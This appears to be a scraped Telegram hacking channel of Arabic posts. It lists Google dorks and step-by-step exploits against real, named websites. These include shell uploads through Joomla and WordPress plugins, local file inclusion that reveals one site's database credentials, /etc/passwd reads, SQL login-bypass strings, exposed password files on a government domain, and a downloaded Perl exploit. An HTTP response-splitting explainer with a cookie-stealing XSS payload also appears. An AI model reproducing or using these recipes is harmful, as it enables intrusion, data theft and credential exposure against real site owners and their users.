Termux CS
3.69K subscribers
1.47K photos
65 videos
273 files
3.66K links
بوت القناة

t.me/TermuxCS_Bot
Download Telegram
Forwarded from Termux CS
Sql.txt
36.1 KB
October 29, 2019
Forwarded from Termux CS
دوركات sql😍

buy.php?bookid=
bycategory.php?id=
cardinfo.php?card=
cart.php?action=
cart.php?cart_id=
cart.php?id=
cart_additem.php?id=
cart_validate.php?id=
cartadd.php?id=
cat.php?iCat=
catalog.php
catalog.php?CatalogID=
catalog_item.php?ID=
catalog_main.php?catid=
category.php
category.php?catid=
category_list.php?id=
categorydisplay.php?catid=
checkout.php?cartid=
checkout.php?UserID=
checkout_confirmed.php?order_id=
checkout1.php?cartid=
comersus_listCategoriesAndProducts.php?idCategory=
comersus_optEmailToFriendForm.php?idProduct=
comersus_optReviewReadExec.php?idProduct=
comersus_viewItem.php?idProduct=
comments_form.php?ID=
contact.php?cartId=
content.php?id=
customerService.php?****ID1=
default.php?catID=
description.php?bookid=
details.php?BookID=
details.php?Press_Release_ID=
details.php?Product_ID=
details.php?Service_ID=
display_item.php?id=
displayproducts.php
downloadTrial.php?intProdID=
emailproduct.php?itemid=
emailToFriend.php?idProduct=
events.php?ID=
faq.php?cartID=
faq_list.php?id=
faqs.php?id=
feedback.php?title=
freedownload.php?bookid=
fullDisplay.php?item=
getbook.php?bookid=
GetItems.php?itemid=
giftDetail.php?id=
help.php?CartId=
home.php?id=
index.php?cart=
index.php?cartID=
index.php?ID=
info.php?ID=
item.php?eid=
item.php?item_id=
item.php?itemid=
item.php?model=
item.php?prodtype=
item.php?shopcd=
item_details.php?catid=
item_list.php?maingroup
item_show.php?code_no=
itemDesc.php?CartId=
itemdetail.php?item=
itemdetails.php?catalogid=
learnmore.php?cartID=
links.php?catid=
list.php?bookid=
List.php?CatID=
listcategoriesandproducts.php?idCategory=
modline.php?id=
myaccount.php?catid=
news.php?id=
order.php?BookID=
order.php?id=
order.php?item_ID=
OrderForm.php?Cart=
page.php?PartID=
payment.php?CartID=
pdetail.php?item_id=
powersearch.php?CartId=
price.php
privacy.php?cartID=
prodbycat.php?intCatalogID=
prodetails.php?prodid=
prodlist.php?catid=
product.php?bookID=
product.php?intProdID=
product_info.php?item_id=
productDetails.php?idProduct=
productDisplay.php
productinfo.php?item=
productlist.php?ViewType=Category&CategoryID=
productpage.php
products.php?ID=
products.php?keyword=
products_category.php?CategoryID=
products_detail.php?CategoryID=
productsByCategory.php?intCatalogID=
prodView.php?idProduct=
promo.php?id=
promotion.php?catid=
pview.php?Item=
resellers.php?idCategory=
results.php?cat=
savecart.php?CartId=
search.php?CartID=
searchcat.php?search_id=
Select_Item.php?id=
Services.php?ID=
shippinginfo.php?CartId=
shop.php?a=
shop.php?action=
shop.php?bookid=
shop.php?cartID=
shop_details.php?prodid=
shopaddtocart.php
shopaddtocart.php?catalogid=
shopbasket.php?bookid=
shopbycategory.php?catid=
shopcart.php?title=
shopcreatorder.php
shopcurrency.php?cid=
shopdc.php?bookid=
shopdisplaycategories.php
shopdisplayproduct.php?catalogid=
shopdisplayproducts.php
shopexd.php
shopexd.php?catalogid=
shopping_basket.php?cartID=
shopprojectlogin.php
shopquery.php?catalogid=
shopremoveitem.php?cartid=
shopreviewadd.php?id=
shopreviewlist.php?id=
ShopSearch.php?CategoryID=
shoptellafriend.php?id=
shopthanks.php
shopwelcome.php?title=
show_item.php?id=
show_item_details.php?item_id=
showbook.php?bookid=
showStore.php?catID=
shprodde.php?SKU=
specials.php?id=
store.php?id=
order.php?BookID=
order.php?id=
order.php?item_ID=
OrderForm.php?Cart=
page.php?PartID=
payment.php?CartID=
pdetail.php?item_id=
powersearch.php?CartId=
price.php
privacy.php?cartID=
prodbycat.php?intCatalogID=
prodetails.php?prodid=
prodlist.php?catid=
product.php?bookID=
product.php?intProdID=
product_info.php?item_id=
productDetails.php?idProduct=
productDisplay.php
productinfo.php?item=
productlist.php?ViewType=Category&CategoryID=
productpage.php
products.php?ID=
products.php?keyword=
products_category.php?CategoryID=
products_detail.php?CategoryID=
productsByCategory.php?intCatalogID=
prodView.php?idProduct=
promo.php?id=
promotion.php?catid=
pview.php?Item=
resellers.php?idCategory=
results.php?cat=
savecart.php?CartId=
search.php?CartID=
searchcat.php?search_id=
Select_Item.php?id=
#CS
October 29, 2019
7- ثغره ثغرة Rce bot

وهي بنظري تعد أسهل ثغرة ...

هذه اثغرة تمكنك من رفع الشيل الخاص بك بسهولة .

#نبدأ شرح الإستغلال :


دورك البحث الخاص بالثغرة :

inurl:viewtable?cid=


موقع مصاب :

http://www.cittainfinite.eu


الاستغلال :

/index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0&Itemid=0


مسار الشيل بعد الرفع :

/media/اسم الشيل.php


#هنا يبدأ عملناا ...


نقوم بوضع رابط الموقع المصاب ... ونلحق به الاستغلال ... مثل :

http://www.cittainfinite.eu/index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0&Itemid=0

وبعدها سيخرج لنا مركز رفع ... وبعد الرفع نجد الشيل في هذا المسار :

http://www.cittainfinite.eu /media/اسم الشيل.php
October 29, 2019
Forwarded from Termux CS
اسوورد وهي مشفرة كالسابق على مقياس DES 
فك تشفيرها وانتهينا

ألحين راح نلاحظ الثغرة على هذه الصفحة
http://www.modammer.com/cgi-bin/webBBS/profiles/

-------------------------------

WebAdverts Script بواسطة Darryl C. Burgdorf

كالسابق تقريبا لكن يسمح لصاحب الموقع لإضافة وتعديل Banners الخاص بالموقع 
وهذا السكربت يحتوي على نقطة ضعف تعرض معلومات حساسة 

المحل الرئيسي للباسوورد الموجود في Webadverts هو:

http://www.modammer.com/cgi-bin/advert/adpassword.txt 

بعد فك تشفير الباسوورد نذهب إلى هذه الصفحة :

http://www.modammer.com/cgi-bin/advert/ads_admin.pl

-------------------------------

WWWBoard Script 
هو أيضا من أنواع المنتديات وتستخدم في الاعلانات 
هالمرة ملف الباسوورد راح يكون صريح معاك وملفه يحمل اسم password.txt
اذا تريد مزيد من الثغرات فقط اذهب ابحث عن 
cgi-bin/wwwebboard أو webboard/password.txt 

-------------------------------

Mailmachine Script
Mailmachine.cgi عبارة عن سكربت ليقوم بعمل MailingList 
عليك برؤية ملف addresses.txt 
حيث يحتوي على عناوين إيميلات الذين قاموا بالاشتراك 
كثير من CGI-Maillists تحتوي على هذه الأخطاء 
مكان وجود الثغرة:
http://www.modammer.com/cgi-bin/mailman/addresses.txt
http://www.modammer.com/cgi-bin/maillist/addresses.txt 
http://www.modammer.com/cgi-bin/mail/addresses.txt 

وأيضا يجب عليك أن تبحث عن addresses.txt لكن احيانا ملفات العناوين تختلف لذلك عليك بالذهاب إلى

http://www.modammer.com/cgi-bin/maillist/subscribe.htm

***************************
هناك سكربتات كثيرة يمكنك استغلالها بنفسك وأيضا هذا النوع من الثغرات 
سهل انك تبحث عن ثغرة خلاله وتستغلها ...
***************************

1.7 كيف لي أن أجد موقع مصاب بثغرة ؟
++++++++++++++++++++++++
قبل مانشرح بكم كيف تبحث عن موقع مصاب اخواني انتم لاتتعلمون لأجل أن تخربون بل بالعكس لكي تزيدون من معرفتكم وهذا مايحمسني لقراءة المزيد من المواضيع ...
ومو أي موقع يحتوي على CGI-Scripts تخترقونه !!!
هذا ليس علم ولانفع 
وحاول تتعلم لغة Perl اللغة التي تمتم بها كتابة أكثر من CGI-Scripts بواسطتها
لذلك حاولوا ان تبحثوا عن الاجوبة والحلول قبل ان تبحثوا عن طرق الاخترق

الحين نقولكم كيف تبحثون عن موقع مصاب بهذا النوع من السكربتات اقولكم كثير ومن السهل فعل ذلك فقط استخدم محركات بحث متطورة وكبيرة مثل:
http://www.google.com
http://www.altavista.com
هذي المحركات سوف تبحث لك عن اي مطابق لكلمة 
cgi-bin أو cgi-bin/calendar.cfg أو cgi-bin/password.tx etc. etc
لذلك عليك بكتابة
cgi-bin/

وفيه برنامج جميل احب اطلعكم عليه وهو 
Intellitamper 
يسمح لك بمعرفة الملفات على السيرفر 
(راح يساعدك كثير)
الموقع:www.intellitamper.com


1.8 الحلول الممكنة Solutions 
++++++++++++++++++++++++
هناك المزيد من الحلول لكن الحل الأمثل والأساسي هو عمل Lock على مجلدات CGI-BIN/

حل آخر وهو زيارة مواقع BugTraq والتي تحتوي على تفاصيل اخر الثغرات فقط استخدم محرك البحث الذي تحتويه هذه المواقع وسوف تجد حلول لثغرات CGI 
المواقع/
http://www.securityfocus.com
http://www.securiteam.com
 

 #cs
October 29, 2019
Forwarded from Termux CS
 ثغرة Local File Include

بسم الله الرحمن الرحيم
اخواني الكرام 
السلام عليكم و رحمة الله وبركاته 
الموضوع عن ثغرات:Local File Include بظن أغلبكم بيعرفها
اولا لدينا الموقع المستهدف:http://theatrefoxcompagnie.com/index.php?page= هذا هو الموقع
نكتب هذا الكود بعد الرابط مباشرة

كود PHP: [عرض]

php://filter/convert.base64-encode/resource=index  


طبعا هو ليس كود إنما فلتر المهم بعد هذا الكود يطلع لنا كلام بالانجليزي.!!!
الان ننسخ هذا الكلام و ننتقل لهذا الموقع لفك التشفير ... http://home.paulschou.net/tools/xlate/تمام
او بإمكانك فك التشفير عن طريق الشيل !!! 
والمراد من فك التشفير هو الحصول على ملف الكونيفق 
بعد فك التشفير نأخذ هذه الكلمة config_inc تمام
وننسخها ونحذف كلمة index في الكود السابق ونضع هذه الكلمة config_inc رائع يعني بصير الكود

كود PHP: [عرض]

php://filter/convert.base64-encode/resource=config_inc  

الان نرى كلام انجليزي نقوم بنسخه و بفك تشفيره إما عبر الشيل او عبر الموقع حسب الرغبة 
وبعد فك التشفير نجد المعلومات كالتالي
user:foxcompagnie
Password:b9waz95d
database:theatrefoxcompagniecom


#CS
October 29, 2019
Forwarded from Termux CS
ثغرة wptf-image-gallery 1.0.3 - Remote File  Download

الاستغلال


./wptf-image-gallery/lib-mbox/ajax_load.php


شرح

http://www.site.com/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=/etc/passwd


#CS
October 29, 2019
Forwarded from Termux CS
الثغرة
 Local File Disclosure in wordpress theme Diarise


الدورك
 inurl:"wp-content/themes/diarise/"

الاستغلال

http://site.com/wp-content/themes/diarise/download.php?calendar=[ file:///etc/passwd ]

#CS
October 29, 2019
Forwarded from Termux CS
الدورك    intext:"ISPROJEK"


بعدها العثور علي لوحه التحكم


راح يكون اليوزر و الباس تبعهم


user: ' or 1=1 limit 1 -- -+

 password: ' or 1=1 limit 1 -- -+


الثاني



الدورك

filename:”wp-config.php” “define(‘DB_PASSWORD’,” extension:php






الدورك
inurl:"index.php?mnu=login"


الاستخدام

/ index.php?mnu=admin


الدورك

intext:"Powered by iyiWebSitesi"


الاستخدام

لوحه التحكم


testpage.com/admin
sql bypass
 id : = ' /*!or*/1=1#
pass : = ' /*!or*/1=1#


#cs
October 29, 2019
Forwarded from Termux CS
 ثغرة   PHPMiniAdmin 1.9 Database Open No-Secure Exploit


الدورك   

inurl:phpminiadmin.php


الاستغلال


https://site.com/salon/db/phpminiadmin.php



#CS
October 29, 2019
Forwarded from Termux CS
ثغرة ال
Joomla RSFirewall Components 2.11.25 Database and Password Disclosure


الدورك 
inurl:''/index.php?option=com_rsfirewall''


أو


 inurl:''/administrator/components/com_rsfirewall/'' intext:Hosted & Designed By Suryanandan.net


أو

intext:Designed by Artilabio



الاستغلال


ممكن نسحب اللسته تبع الباسورد

/administrator/components/com_rsfirewall/assets/dictionary/passwords.txt


أو الوصول لقاعدة  البيانات

/administrator/components/com_rsfirewall/sql/mysql/configuration.data.sql

 /administrator/components/com_rsfirewall/sql/mysql/configuration.sql


/administrator/components/com_rsfirewall/sql/mysql/exceptions.sql


/administrator/components/com_rsfirewall/sql/mysql/feeds.data.sql


 /administrator/components/com_rsfirewall/

وغيرها من القواعد


مثال


www.ippbm.gov.my/administrator/components/com_rsfirewall/assets/dictionary/passwords.txt



#CS
October 29, 2019
Forwarded from Termux CS
الاسم : SO-AT Solution CMS Bypass SQL Login


الدورك  inurl:/coop/re_register.php


الاستغلال


/coop/adminlogon.php



User: ' or 1=1 limit 1 -- -+
Password: ' or 1=1 limit 1 -- -+



أمثلة

 http://healthcoop.or.th/coop/adminlogon.php



 http://www.tot-coop.com/coop/adminlogon.php



#CS
October 29, 2019
Forwarded from Termux CS
الاسم    Server Info

الدورك

inurl:"debug/default/view?panel=config"


راح تطلع لك مواقع كثيرة

مجرد ما تدخل لها راح يعطيك معلومات
وايضا اسم المستخدم وكلمة المرور

#CS
October 29, 2019
Forwarded from Termux CS
ثغرة  (FTP2FTP ( Arbitrary File Download :
الدورك  
: inurl:/download2.php?id=

الاستغلال


http(s)://host.com/[patch]?id=../index.php
or
http(s)://host.com/[patch]?id=/index.php

مثال


http://www.supersat.cz/download/azbox/download2.php?id=23

after exploit :

http://www.supersat.cz/download/azbox/download2.php?id=../index.php
=========================



#CS
October 29, 2019
Forwarded from Termux CS
ثغرة Bypass Admin Panel

الدورك
© Copyright 2019 Developed by VSFB Developers Zone. All Rights Reserved. |


#username password: '='or' |

مثال


http://nationalhairtransplant.in/admin/dashboard.php

http://delhiskinhospital.com/admin/dashboard.php?mes=login


http://www.saraogicolorlab.com/admin/login.php


#CS
October 29, 2019
Forwarded from Termux CS
ثغرة
WordPress St_Newsletter Swift Mailer Plugins 2.7 Remote Shell Upload Vulnerability


Dork: inurl:''/wp-content/plugins/st_newsletter/''

Google Dorks : inurl:''/wp-content/plugins/st_newsletter/'' + intext:''© 2016 Prevent Cancer Now SUM LogoSUM Brand + Design'' + intext:''Copyright © 2000-2012 Silicon Valley Fellowship'' # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ] + CWE-434: Unrestricted Upload of File with Dangerous Type # Visit Web Security Blog and Forum : cyberizm.org [ Team ] ~ ayarsecurity.com [ Friend ] #################################################################################################
# Exploit :

/wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/upload/test.html

/wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/browser/default/browser.html


/wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/browser/default/frmupload.html


/wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/fckeditor.html


# Directory File Path : /wp-content/uploads/...... /wp-content/uploads/[YEAR]/

Exploit : phpinfo System Information

/wp-content/plugins/st_newsletter/Swift5/tests/units/runTests.php ############################

مثال
[+] revistamoviola.com/wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/upload/test.html

[+] earthnc.com/wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/upload/test.html

[+] siliconvalleyfellowship.org/wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/upload/test.html


[+] pedibus-geneve.ch/wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/upload/test.html

[+] parkdietzassociates.com/wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/upload/test.html


[+] storytellerwine.com/wine/wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/upload/test.html


[+] preventcancernow.ca/wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/upload/test.html

#cs
October 29, 2019
Forwarded from Termux CS
ثغرة wptf-image-gallery 1.0.3 - Remote File  Download

الاستغلال


./wptf-image-gallery/lib-mbox/ajax_load.php


شرح

http://www.site.com/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=/etc/passwd


#CS
October 29, 2019
Forwarded from Termux CS
نظره على ثغرات HTTP Response Splitting |

هو نوع من انواع ثغرات الclient-side ألا و هي ثغرة HTTP Header Injection.ما هي HTTP Response Splitting : هي أحد أنواع ثغرات الclient-side التي تظهر اذا تم استخدام مدخلات تحت تحكم المستخدم كقيم لHTTP Response Headers بدون تطهير و تأكد مناسبين، الأمر الذي قد يؤدي الي أمور خطيرة مثل ثغرات الCross Site Scripting و الCache Poisoning.في هذه الحالة يستطيع المهاجم استخدام قيمة الresponse header و اضافة الصيغتين CR و LF للخروج من الheader الراجع من الserver و إضافة الheaders المرادة، مما يسمح للمهاجم باستغلال الثغرة لتنفيذ هجوم Cache Poisoning اذا ما كان هناك caching server و من ثم إعادة نفس الرد من الserver لكل من يستخدم الموقع.يمكن أيضا الخروج كلياً من قسم الheaders و إضافة أي محتوي يريده المهاجم في قسم الbody من الرد، و الذي سوف يتم عرضه من قبل المتصفح. في هذه الحالة يمكن تنفيذ هجمات الCross-Site Scripting و التي قد تؤدي إلي سرقة حسابات المستخدمين.الصيغة CR هي اختصار لمصطلح Carriage Return، و التي تستخدم في الكتابة للرجوع لبداية السطر و عادةً ما توضح عن طريق كتابة r\ في لغات البرمجة. الصيغة الأخري، ألا و هي LF  هي اختصار للمصطلح Line Feed، و تستخدم للحصول علي سطر جديد، سواء في ملف أو غيره، و تستخدم عن طريق كتابة n\ في العديد من لغات البرمجة.الصيغتين السابق ذكرهما لا يستخدمان عادةً بنفس الطريقة كما هو الحال في لغات البرمجة عندما نستخدمهما في البحث عن ثغرات الHeader Injection، لأن الweb applications تعتمد علي تقنية الURL Encoding في فهم و ترجمة أي مدخل ما لم يكن أحد حروف اللغة الإنجليزية أو أحد الأرقام من 0-9. لذلك، تم تعيين القيمة 0a% و 0d% للقيمتين n\ و r\ بالترتيب، علي أن تستخدم القيمة 0a% حينما نود التعبير عن الLF، و القيمة 0d% حين يتم التعبير عن الCR.أحد اكثر الأماكن شيوعاً لوجود هذا النوع من الثغرات هما الSet-Cookie و الLocation Headers. في الحالة الأولي يتم استخدام مدخل من المستخدم مباشرة كقيمة لcookie، و التي سوف تستخدم لاحقاً من قِبَل الweb application لتحديد حالة المستخدم. في الحالة الثانية يتم استخدام المدخل كقيمة الLocation Header، و الذي تستخدمه المتصفحات لمعرفة الهدف المرات التحويل إليه من قبل الweb application،

مثال 1:

فلنفترض ان هناك موقع يمكن استخدامه بلغتين، الإنجليزية و العربية مثلا. لنفترض أيضا ان هناك link في كل صفحة في الموقع و وظيفتها هي تغيير اللغة من العربية للإنجليزية و العكس، و شكل هذه الlink كاﻵتي في حالة التحويل للغة الإنجليزية:http://example.com?lang=enاذا ما تم الضغط علي هذه ال link، يتم إرسال طلب GET ل http://example.com?lang=en. يستقبل الserver الطلب، ثم يتم تحويل المستخدم لنفس الصفحة و لكن في الresponse يتم تحديد http header جديد، اسمه Set-Cookie و قيمته هي lang=en.في هذه الحالة يقوم الserver باستخدام القيمة المخصصة للمدخل lang مباشرة في الheader المسمي Set-Cookie بدون أي تأكد من عدم احتواؤه علي الصيغتين CR و LF مما يؤدي لظهور ثغرة HTTP Header Injection. في هذه الحالة يستطيع المهاجم استخدام الثغرة لتثبيت headers جديدة بأي قيم مرادة كالآتي:http://example.com?lang=en%0d%0aSet-Cookie:hacked=1في المثال السابق، يقوم المهاجم بالخروج من قيمة الSet-Cookie header الأولي (الأصلية) عبر استخدام الصيغتين 0d% و 0a% متتابعتين، ثم إضافة header جديد إسمه Set-Cookie و قيمته hacked=1 كتوضيح للثغرة، التالي هو منظر تخيلي للجزء المعني من رد الserver بعد الطلب السابق:HTTP/1.1 200 OKContent-Type: text/htmlSet-Cookie: lang=enSet-Cookie: hacked=1يمكن للمهاجم أيضا تغيير محتوي الصفحة كما ذكرنا سابقا عن طريق إضافة أكواد HTML لقسم الbody من رد الserver، الأمر الذي يمكن إستغلاله بسهولة للحصول علي و استغلال ثغرة Cross-Site Scripting إذا ما كان وجود القيم < و > في المدخلات مسموحاً من قِبَل الserver. التالي هو طلب GET تخيلي للاستغلال المذكور:http://example.com/?lang=en%0d%aContent-Length:53%0d%0a%0d%a%3Chtml%3E%3Cscript%3Ealert%28document.cookie%29%3C%2fscript%3E%3C%2fhtml%3Eفي المثال السابق يتم إستخدام الصيغتين 0d% و 0a% متبوعتان بالheader المسمى Content-Length و قيمته 53، مما يخبر المتصفح ان عدد البايتات (الحروف) المراد إظهارها كbody للرد هو 53. يتم بعد ذلك استخدام نفس الصيغتين و لكن مرتين متتابعتين، و ذلك لإعلام المتصفح اننا نريد الوصول لقسم الbody من إجابة الserver، ثم بعد ذلك يتم حقن القيمة المراد إظهارها من المتصفح.القيمة  %3Chtml%3E%3Cscript%3Ealert%28document.cookie%29%3C%2fscript%3E%3C%2fhtml%3E ما هي الا <html><script>alert(document.cookie)</script></html>  و لكن بعمد عملية
October 29, 2019
Forwarded from Termux CS
October 29, 2019
Forwarded from !+'s me
لأختراق ثغرة inurl:com_jumi
تنزل الملف من الرابط
تفتح cmd
تكتب desktop
تكتبperl
تكتب jumi.pl
تكتب www.domain.com
مصاب بثغره والحمدالله
طريقة تسجيل administartor
Dork : inurl:com_jumi
Exploit download : http://pastebin.com/kqjtBXpM
October 29, 2019
Forwarded from !+'s me
لأختراق ثغرة inurl:com_jumi
تنزل الملف من الرابط
تفتح cmd
تكتب desktop
تكتبperl
تكتب jumi.pl
تكتب www.domain.com
يخرجلك لائحة يوزر
Admin:********
Pass:*********
مصاب بثغره والحمدالله
طريقة تسجيل administartor
Dork : inurl:com_jumi
Exploit download : http://pastebin.com/kqjtBXpM
October 29, 2019